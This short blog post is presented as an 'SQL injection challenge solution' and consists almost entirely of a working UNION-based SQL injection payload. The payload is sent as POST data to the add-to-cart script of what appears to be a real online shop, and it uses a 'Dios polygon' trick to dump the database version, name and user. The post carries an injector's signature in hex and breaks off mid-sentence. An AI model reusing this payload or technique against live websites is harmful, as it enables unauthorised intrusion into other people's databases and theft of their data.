Author Archives: BloodSecurity Darkjin

SQL INJECTION Challenge Solution At PHA

May 21st, 2015 📆 | 3791 Views ⚑

Post data Injection 🙂 Get:http://www.thefaceshop.my/shopping/addcart.php Post: Buy=Add+To+Cart&ItemID=100016′ UNION distinctrow select 1,polygon((select*from(select(!x-~0)from(select make_set(511,0x3c62723e496e6a6563746564206279204434726b6a316e3c62723e,version(),0x3c62723e,database(),0x3c62723e,user())x)y)j))– -&ItemQuantity=1&ItemName=Calming+Seed+1-Second+Calming+Mist+Toner you can use the Dios polygon at

Tagged with: